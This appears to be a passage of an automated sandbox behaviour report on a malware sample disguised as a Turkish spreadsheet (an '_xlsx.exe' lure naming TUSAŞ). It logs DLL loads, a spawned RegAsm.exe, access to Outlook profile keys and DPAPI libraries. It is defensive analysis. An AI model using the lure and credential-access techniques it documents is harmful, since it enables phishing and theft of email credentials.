Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: System.pdb2& source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: mscorlib.pdb source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdbRSDS source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdb source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: System.Core.pdb source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: Microsoft.VisualBasic.pdbH source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdb source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: System.pdb source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER8D7A.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdb source: WER8D7A.tmp.dmp.7.dr

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD9493C push ebp; iretd		0_2_00007FFB4AD9493E
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AE5026B push esp; retf 4810h		0_2_00007FFB4AE50312

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
